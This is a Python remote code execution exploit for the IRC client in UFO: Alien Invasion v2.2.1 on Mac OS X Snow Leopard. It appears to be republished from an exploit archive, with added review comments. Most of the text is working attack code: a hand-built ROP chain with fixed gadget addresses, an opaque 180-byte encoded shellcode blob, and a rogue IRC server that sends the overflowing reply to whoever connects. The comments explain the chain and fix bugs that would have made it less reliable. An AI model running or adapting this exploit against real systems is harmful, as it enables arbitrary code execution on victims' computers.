UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard
UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard (ROP)
==============================================================================
#!/usr/bin/python
# UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution – MacOSX
# OS X Snow Leopard: d1dn0t
# OS X Leopard: dookie
# Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013
import sys, socket, struct
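WRITEABLE = 0x8fe66448  # writable dword: strcpy() destination, also a harmless value for "don't care" pops
STRCPY = 0x8fe2db10     # strcpy() on the author's OS X 10.6 image (which library is not stated -- confirm)

# Every absolute address in this file is specific to the OS X 10.6 image the
# author tested on. The 0x8fe0xxxx-0x8fe6xxxx range matches where 32-bit dyld
# was mapped at a fixed address on Leopard/Snow Leopard, and 0xffff0xxx looks
# like the i386 commpage -- presumably that is why the chain survives library
# ASLR, but verify every gadget in a debugger on the real target before use.
# NOTE(review): the author calls WRITEABLE "heap"; whatever page it is must be
# both writable and executable on the target, since the payload runs from it.

# Stage-2 payload, 180 bytes, NUL-free (it is moved with strcpy(), so a 0x00
# byte would truncate it). The opening \xdb\xc3\xd9\x74\x24\xf4 and the
# mov cl,0x27 loop counter look like a shikata_ga_nai-style fnstenv decoder,
# i.e. encoder output: what the decoded payload does (bind/reverse shell,
# which host or port) cannot be read from this listing.
# NOTE(review): regenerate the payload yourself before any authorised test;
# never run shellcode whose behaviour you cannot inspect.
shellcode = (
    b"\xdb\xc3\xd9\x74\x24\xf4\xbb\xf3\xbd\x8d\x7c\x33\xc9\x5d\xb1"
    b"\x27\x31\x5d\x18\x03\x5d\x18\x83\xc5\xf7\x5f\x78\x4d\x37\x06"
    b"\xd3\xee\xe7\x79\x84\xbc\xb7\x1b\xe9\xc1\xb8\x59\x8f\xc1\xc6"
    b"\x5d\xf9\x04\x94\x0f\xab\xe0\x18\xb2\x5a\xad\x91\x51\x36\x5d"
    b"\xf2\xc3\x95\xed\x9c\x26\x99\x7c\x3b\xeb\xcc\xd2\x73\x61\x3c"
    b"\x52\x01\x28\xec\x01\xb3\x86\xa0\xb8\xf6\xa7\xb3\x90\x81\x6f"
    b"\x02\xc2\x12\x84\x64\xb7\x47\x0c\x34\x87\x3d\x7f\x3a\x95\x82"
    b"\xfc\xc0\x59\x71\xf2\x06\x9e\x29\xa4\x38\x4e\x79\x7f\x74\xee"
    b"\xe9\x10\xba\xc2\x7c\x18\x73\x5e\xb3\x9a\xf0\xa5\x4b\xef\xe1"
    b"\x68\x8b\x5f\x66\xa4\x24\x13\x1e\xd2\x15\xb1\xb7\x4c\xe0\xd6"
    b"\x18\xc1\xa1\x48\x29\xda\x88\xe9\x78\xdd\x42\x63\x99\x8d\x32"
    b"\x20\x0e\x7e\x02\xc1\x63\xfe\x53\x0e\x2b\xaf\xd3\x43\x4c\x45"
)


def _p32(value):
    """Pack *value* as one little-endian 32-bit stack slot (x86 gadget/argument)."""
    return struct.pack('<I', value)


# ROP chain, 164 bytes. Overall idea: (1) capture ESP, (2) jump over a
# pre-built strcpy() frame, (3) compute ESP+0x90 (start of the NOP sled that
# follows this chain) and patch it into the frame's src slot, (4) pivot back
# onto the frame so strcpy() copies sled+shellcode to WRITEABLE, then return
# into WRITEABLE. Offsets below are relative to the ESP captured in step (1),
# which points at the dword *after* the push-esp gadget (byte 20 of this
# chain): +0x10 is the "EEEE" src slot, +0x90 is the NOP sled.
ROP = b"".join([
    # ==================== Put stack pointer into EAX/EDX ====================
    _p32(0x8fe2b3d4),  # pop ; ret -- pops the WRITEABLE dword below
    _p32(WRITEABLE),
    _p32(0x8fe2fb63),  # pop eax ; ret
    _p32(WRITEABLE),   # eax = WRITEABLE, so the stores in the next gadget are safe
    _p32(0x8fe2fb58),  # push esp ; and al,0x4 ; mov [eax+0x28],edx ; mov edx,[esp] ; mov [eax],edx ; pop eax ; ret
                       # -> eax = edx = ESP (address of the next dword)
    # ==================== Jump over the strcpy frame ====================
    _p32(0xffff1d6b),  # add esp,0x1c ; pop ebp ; ret -- skips the 32 bytes below
    # ==================== strcpy() frame (executed last, via the pivot) ====================
    _p32(STRCPY),      # strcpy(dst=WRITEABLE, src=<patched below>)
    _p32(0x8fe2dfd1),  # pop ; pop ; ret -- strcpy's return address, hops over its two args
    _p32(WRITEABLE),   # dst
    b"EEEE",           # src placeholder, overwritten at run time with ESP+0x90
    _p32(WRITEABLE),   # then return into the copied NOP sled + shellcode
    b"C" * 12,         # padding, never executed
    # ==================== Craft the src argument ====================
    _p32(0x8fe2dae4),  # mov ecx,[esp+0x4] ; add eax,edx ; sub eax,ecx ; ret -- ecx = 0xffffffff
    _p32(0x8fe2b3d4),  # pop ; ret -- pops the ecx seed below
    _p32(0xffffffff),  # seed for ecx (read by the gadget above)
    # inc twice: ecx = 1. The gadget also does xor al,0xc9; doing it twice
    # cancels the xor, which is why each inc pair is paired.
    # NOTE(review): the listed gadget has no ret shown -- it presumably falls
    # through into one; confirm in a debugger.
    _p32(0x8fe0c0c7),  # inc ecx ; xor al,0xc9
    _p32(0x8fe0c0c7),  # inc ecx ; xor al,0xc9
    _p32(0x8fe24b3c),  # add ecx,ecx ; ret
    _p32(0x8fe24b3c),  # add ecx,ecx ; ret
    _p32(0x8fe24b3c),  # add ecx,ecx ; ret
    _p32(0x8fe24b3c),  # add ecx,ecx ; ret -- ecx = 0x10 (original comment said 0x40; the arithmetic gives 0x10)
    _p32(0x8fe2c71d),  # mov eax,edx ; ret -- restore saved ESP into eax (it was clobbered above)
    _p32(0x8fe2def4),  # add eax,ecx ; ret -- eax = ESP+0x10, the "EEEE" slot
    _p32(0x8fe0e32d),  # xchg eax,edx -- edx = ESP+0x10, eax = ESP again
    _p32(0x8fe0c0c7),  # inc ecx ; xor al,0xc9
    _p32(0x8fe0c0c7),  # inc ecx ; xor al,0xc9 -- ecx = 0x12, al restored
    _p32(0x8fe24b3c),  # add ecx,ecx ; ret
    _p32(0x8fe24b3c),  # add ecx,ecx ; ret
    _p32(0x8fe24b3c),  # add ecx,ecx ; ret -- ecx = 0x90
    _p32(0x8fe2def4),  # add eax,ecx ; ret -- eax = ESP+0x90, the NOP sled
    _p32(0x8fe0e32d),  # xchg eax,edx -- eax = &src slot, edx = &NOP sled
    _p32(0x8fe2fb61),  # mov [eax],edx ; pop eax ; ret -- patch src slot
    b"GGGG",           # junk consumed by that pop eax
    # ==================== Pivot back onto the strcpy frame ====================
    _p32(0x8fe0e32d),  # xchg eax,edx -- eax = ESP+0x90
    _p32(0x8fe2daea),  # sub eax,ecx ; ret -- eax = saved ESP
    _p32(0x8fe0b1c2),  # xchg eax,ebp ; inc ebp ; ret
    _p32(0x8fe2b6a5),  # dec ebp ; ret -- ebp = saved ESP
    _p32(0xffff01f3),  # mov esp,ebp ; pop ebp ; ret -- pops the add-esp gadget, returns into STRCPY
    b"GGGG",           # junk
])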
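# ==================== Assemble the IRC line and serve it ====================
# One IRC numeric reply (001 = RPL_WELCOME) whose trailing parameter overflows
# the client's receive buffer: 528 bytes of filler reach the saved return
# address on the author's build, the ROP chain follows, then a 10-byte NOP
# sled and the shellcode that the chain strcpy()s out of the stack.
# NOTE(review): the 528 offset, like every gadget address, is specific to the
# game and OS build the author tested; confirm in a debugger before relying
# on it. The victim has to connect *to* this host with the in-game IRC
# client, i.e. the attack needs the target to be pointed at a rogue server.
sploit = b"001 :"
sploit += b"\x41" * 528
sploit += ROP
sploit += b"\x90" * 10
sploit += shellcode
sploit += b"\x0d\x0a"  # IRC line terminator


def main(argv):
    """Listen once, hand the payload to the first client that connects, exit.

    Optional argv[1] / argv[2] select the bind address and port; the defaults
    (all interfaces, 6667) are the original behaviour. Binding all interfaces
    serves the payload to anyone who can reach the port, so on a shared
    network prefer an address reachable only by the lab target.
    """
    host = argv[1] if len(argv) > 1 else ''
    port = int(argv[2]) if len(argv) > 2 else 6667
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow an immediate re-run after a previous connection left TIME_WAIT.
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        listener.bind((host, port))
        listener.listen(1)
        print("[*] Listening on %s:%d." % (host or '0.0.0.0', port))
        print("[*] Have someone connect to you.")
        print("[*] Type [control]-c to exit.")
        conn, addr = listener.accept()
        try:
            print("[*] Received connection from: %s" % (addr,))
            # sendall(): a bare send() may return after a partial write and
            # leave the client with a truncated, harmless line.
            conn.sendall(sploit)
        finally:
            conn.close()  # the original wrote `conn.close` without (), a no-op
    finally:
        listener.close()


if __name__ == "__main__":
    main(sys.argv)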
# Inj3ct0r.com [2010-07-08]
Source: http://inj3ct0r.com/exploits/13239
